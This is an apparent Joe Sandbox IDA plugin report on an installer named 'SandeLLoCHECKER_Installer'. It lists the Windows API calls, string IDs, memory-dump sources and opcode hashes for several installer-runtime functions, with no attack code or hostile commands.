                                                                                                                        • Instruction Fuzzy Hash: 7F419D326043459FE721DF78CC06F9AB7E9AF89300F004B29F549E71A0EB70A945CB92
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 009ABC1A
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009ABC2D
                                                                                                                        • GetDC.USER32(00000000), ref: 009ABC87
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009ABC9A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDevice
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 328075279-0
                                                                                                                        • Opcode ID: a563053699fdf8a0d3cfb933d7b4d4ac08fb30f1b7ed9b257d07baf52ed3c006
                                                                                                                        • Instruction ID: 2641a1dc695fb28d2783f83886d24da17e9f7ff73fb16d9c97012cdb6dc13cfb
                                                                                                                        • Opcode Fuzzy Hash: a563053699fdf8a0d3cfb933d7b4d4ac08fb30f1b7ed9b257d07baf52ed3c006
                                                                                                                        • Instruction Fuzzy Hash: C3316EB1910615EED712DF74DC45B6AB7BCFF1A3A5F108336E416E3291EB305942CA50
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSection.KERNEL32(?,C7BA013E), ref: 00863C7A
                                                                                                                        • EnterCriticalSection.KERNEL32(?,C7BA013E), ref: 00863C87
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00863CD8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                        • String ID: v
                                                                                                                        • API String ID: 3991485460-3261393531
                                                                                                                        • Opcode ID: 3929ec50c315bd612f20cab93950de9ccc0adef88f0f9c4f7f3fd3ec28f58b5b
                                                                                                                        • Instruction ID: f0aee9c7dc7773cc00c152ea639f41ca7e26479b48e3b4220b509ef2996ce2b6
                                                                                                                        • Opcode Fuzzy Hash: 3929ec50c315bd612f20cab93950de9ccc0adef88f0f9c4f7f3fd3ec28f58b5b
                                                                                                                        • Instruction Fuzzy Hash: 8821A336A002449FDF11DF64DC45BE9BBB4FB16324F1502B9E859EB392D7325A06CB60
                                                                                                                        APIs
                                                                                                                        • InitializeCriticalSection.KERNEL32(?,C7BA013E,?), ref: 00863BAD
                                                                                                                        • EnterCriticalSection.KERNEL32(?,C7BA013E,?), ref: 00863BBA
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00863BE2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterInitializeLeave
                                                                                                                        • String ID: v
                                                                                                                        • API String ID: 3991485460-3261393531
                                                                                                                        • Opcode ID: 2bd535b7cd2a29215c6291fa9c358943188e6676b154cf4c4611015a1c040fa5
                                                                                                                        • Instruction ID: 2f136baf7fbc8947ba09c8fc07d8ac6c26bdfddae3c216e2fd648d365bc69458
                                                                                                                        • Opcode Fuzzy Hash: 2bd535b7cd2a29215c6291fa9c358943188e6676b154cf4c4611015a1c040fa5
                                                                                                                        • Instruction Fuzzy Hash: 2021DA36904244DFCF01CF64D840BE9BBB4FB55334F1102A9D855E7352D7325A09CB90
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 00A13B9D
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00A13BA8
                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00A13C16
                                                                                                                          • Part of subcall function 00A13CF8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00A13D10
                                                                                                                        • std::locale::_Setgloballocale.LIBCPMT ref: 00A13BC3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 677527491-0
                                                                                                                        • Opcode ID: b3150081365aca82ace9fe1062a5a49dbb97f28270d744301bb3bb248b87c87f
                                                                                                                        • Instruction ID: 96988f386f1b44ba48f3e015a60925c30e3215a052f283833a340202bda3a561
                                                                                                                        • Opcode Fuzzy Hash: b3150081365aca82ace9fe1062a5a49dbb97f28270d744301bb3bb248b87c87f
                                                                                                                        • Instruction Fuzzy Hash: BC015A76A002219BCF05EF60E955ABD7BB5BF84750B244029E911AB391CF74AF82CBC1
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(00000000,AtlAxWin140,?,?,?,80000000,00000000,00000000,?,00000000,00000000), ref: 008543A6
                                                                                                                        • SendMessageW.USER32(?,00000000,00000000), ref: 008544A2
                                                                                                                          • Part of subcall function 00855E00: SysFreeString.OLEAUT32(00000000), ref: 00855EA3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateFreeMessageSendStringWindow
                                                                                                                        • String ID: AtlAxWin140
                                                                                                                        • API String ID: 4045344427-3842940177
                                                                                                                        • Opcode ID: e9cf54f81cacd7bdab06f3b5eafc6736cff8ad18cf04467ffc230c2341916f52
                                                                                                                        • Instruction ID: e45c17b7368fded770dbff095ce20e9cdaea75808af34cb72d1c9588b5cd6fc1
                                                                                                                        • Opcode Fuzzy Hash: e9cf54f81cacd7bdab06f3b5eafc6736cff8ad18cf04467ffc230c2341916f52
                                                                                                                        • Instruction Fuzzy Hash: F3911274600205AFDB14CF68C888B6ABBB9FF49724F1085A8F919DB291DB71E905CB50
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • CloseHandle.KERNEL32(?,C7BA013E,000000C9,00000000), ref: 00994243
                                                                                                                        • DeleteCriticalSection.KERNEL32(?,C7BA013E,000000C9,00000000), ref: 009942D1
                                                                                                                        Strings
                                                                                                                        • << Advanced Installer (x86) Log >>, xrefs: 009941AF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer$CloseCriticalDeleteHandleHeapProcessSection
                                                                                                                        • String ID: << Advanced Installer (x86) Log >>
                                                                                                                        • API String ID: 3699736680-396061572
                                                                                                                        • Opcode ID: ef6dbcf4d5c297fca8aa0081a300114857d482fa7a7ee762e0ed93b119281f0c
                                                                                                                        • Instruction ID: a4ece6f43ceae1e0fb6ac3ad577dc8f40da6390b87edf2000f9c4b168a873754
                                                                                                                        • Opcode Fuzzy Hash: ef6dbcf4d5c297fca8aa0081a300114857d482fa7a7ee762e0ed93b119281f0c
                                                                                                                        • Instruction Fuzzy Hash: 1A61ED71A00649DFDB01CF6CC908B5EBBF8FF95314F248299E4019B791DB74AA05CBA1
                                                                                                                        APIs
                                                                                                                        • OpenEventW.KERNEL32(00000000,00000000,C7BA013E,_pbl_evt,00000008,?,?,00AC270C,00000001,C7BA013E,00000000), ref: 009B67DE
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000001,?), ref: 009B67FB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Event$CreateOpen
                                                                                                                        • String ID: _pbl_evt
                                                                                                                        • API String ID: 2335040897-4023232351
                                                                                                                        • Opcode ID: 6b6c3869cb2fc16a348e08682fb2a4f2a15fa181696b92e199e140877c9cbcdc
                                                                                                                        • Instruction ID: f18f5a3f6f83ee5ca9f32379ab7915ffc8a39e5bb276ed86c024acb3284973e4
                                                                                                                        • Opcode Fuzzy Hash: 6b6c3869cb2fc16a348e08682fb2a4f2a15fa181696b92e199e140877c9cbcdc
                                                                                                                        • Instruction Fuzzy Hash: 2B518271D10609EFDB10DF68CD46BEEB7B8FF04720F508229E811A7280EB746A45CB95
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0088633B
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0088639E
Strings
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
• String ID: bad locale name
• API String ID: 3988782225-1405518554
• Opcode ID: e64d65300becd52f7d46d8690526208ff9262f1d84a9b01834b0e8b7cab3fea4
• Instruction ID: 662a829eaf81734180154d0d3bab588d1d599a182e83e192b5fcd675198e585c
• Opcode Fuzzy Hash: e64d65300becd52f7d46d8690526208ff9262f1d84a9b01834b0e8b7cab3fea4
• Instruction Fuzzy Hash: CB21DE70A05784DED721CF68C90474BBBE4AF15714F14869EE445C7B81D7B5AA08C7A1
APIs
• VirtualQuery.KERNEL32(80000000,00A130FA,0000001C,00A132EF,00000000,?,?,?,?,?,?,?,00A130FA,00000004,00B2F954,00A1337F), ref: 00A131C6
• GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00A130FA,00000004,00B2F954,00A1337F), ref: 00A131E1
Strings
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID: InfoQuerySystemVirtual
• String ID: D
• API String ID: 401686933-2746444292
• Opcode ID: f6547e6262ddb08602da84ddd9944797788a6809de9d77cf87a0df59b3b12f77
• Instruction ID: 89930cdf3a5a563fac428da191b1c688a91c60063a2f664ff3dbb16f4470d80f
• Opcode Fuzzy Hash: f6547e6262ddb08602da84ddd9944797788a6809de9d77cf87a0df59b3b12f77
• Instruction Fuzzy Hash: 1E01F773700109ABCF14DF69DC05BDD7BAAAFC5324F1CC221EE19D7244EA34D9428680
APIs
• __alldvrm.LIBCMT ref: 00A200AF
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A200D4
Strings
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID: Unothrow_t@std@@@__alldvrm__ehfuncinfo$??2@
• String ID: Df
• API String ID: 3107155309-381112559
• Opcode ID: 62f07188e76c5965496c506f9e2b439d44607c8f5dc6f1a37caf7df8bfbe0a86
• Instruction ID: 24785fe06cc160fd5fec33cb30f8a9472f6dfec98b07f1b3ae0f9b898319a68a
• Opcode Fuzzy Hash: 62f07188e76c5965496c506f9e2b439d44607c8f5dc6f1a37caf7df8bfbe0a86
• Instruction Fuzzy Hash: 14F05277644204BFDB202B91AC86F8FBB6EDBC8765F244020B208E72A0D9719C0093A4
APIs
• GetParent.USER32(0000000F), ref: 008689E2
Strings
• C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h, xrefs: 008689C7
• Unknown exception, xrefs: 008689B7
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID: Parent
• String ID: C:\ReleaseAI\stubs\setup\controls\generic\VisualStyleBorder.h$Unknown exception
• API String ID: 975332729-9186675
• Opcode ID: 06095d424a36f16296aafd9343f637ad9960bd6b9f2ed011bccd653fcf003670
• Instruction ID: e7f32b49dd56546893dfdb05284df2ee2b8efb686852d7c20b441f18089eee81
• Opcode Fuzzy Hash: 06095d424a36f16296aafd9343f637ad9960bd6b9f2ed011bccd653fcf003670
• Instruction Fuzzy Hash: BB015E30D0128CEFDB00EBE8C915ADDBBB0FF15304F548498E042AB286DBB45A48DB92
APIs
Strings
• C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp, xrefs: 00853C06
• Unknown exception, xrefs: 00853BF6
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID: ActiveWindow
• String ID: C:\ReleaseAI\platform\ui\controls\mshtml\GenericAxControl.cpp$Unknown exception
• API String ID: 2558294473-2631306498
• Opcode ID: 87d67dc8a9e1ec5ecfe16405af32dfb942de506cd5010d21dec71be7062feb6a
• Instruction ID: 7a9c1958f208312ae4db13938d6682e444cf8f3d2cc340237dfd2ca2ea9a2cdc
• Opcode Fuzzy Hash: 87d67dc8a9e1ec5ecfe16405af32dfb942de506cd5010d21dec71be7062feb6a
• Instruction Fuzzy Hash: 01014C30D0628CEEDF05EBE8C915BDDBBB0BF55304F548498E442AB286DBB45B08D792
APIs
  • Part of subcall function 0085A4A0: InitializeCriticalSectionAndSpinCount.KERNEL32(00B2FDD0,00000000,C7BA013E,00840000,Function_001FDE90,000000FF,?,00A155F3,?,?,?,008475C6), ref: 0085A4C5
  • Part of subcall function 0085A4A0: GetLastError.KERNEL32(?,00A155F3,?,?,?,008475C6), ref: 0085A4CF
• IsDebuggerPresent.KERNEL32(?,?,?,008475C6), ref: 00A155F7
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,008475C6), ref: 00A15606
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A15601
Memory Dump Source
• Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
Similarity
• API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
• API String ID: 450123788-631824599
• Opcode ID: 77f698fc39b123303142036777994ac411ff54c313c4c234aa9f7d58453f762f
• Instruction ID: b1b6e96592e1ce107732ab6e0e50b9ffa37b350949dfe83c84b84c50ab1892c3
• Opcode Fuzzy Hash: 77f698fc39b123303142036777994ac411ff54c313c4c234aa9f7d58453f762f
• Instruction Fuzzy Hash: 04E06D70600B418FD330AFB8E544796BBE4AF44708F54892DE896C3680EBB5D489CBA1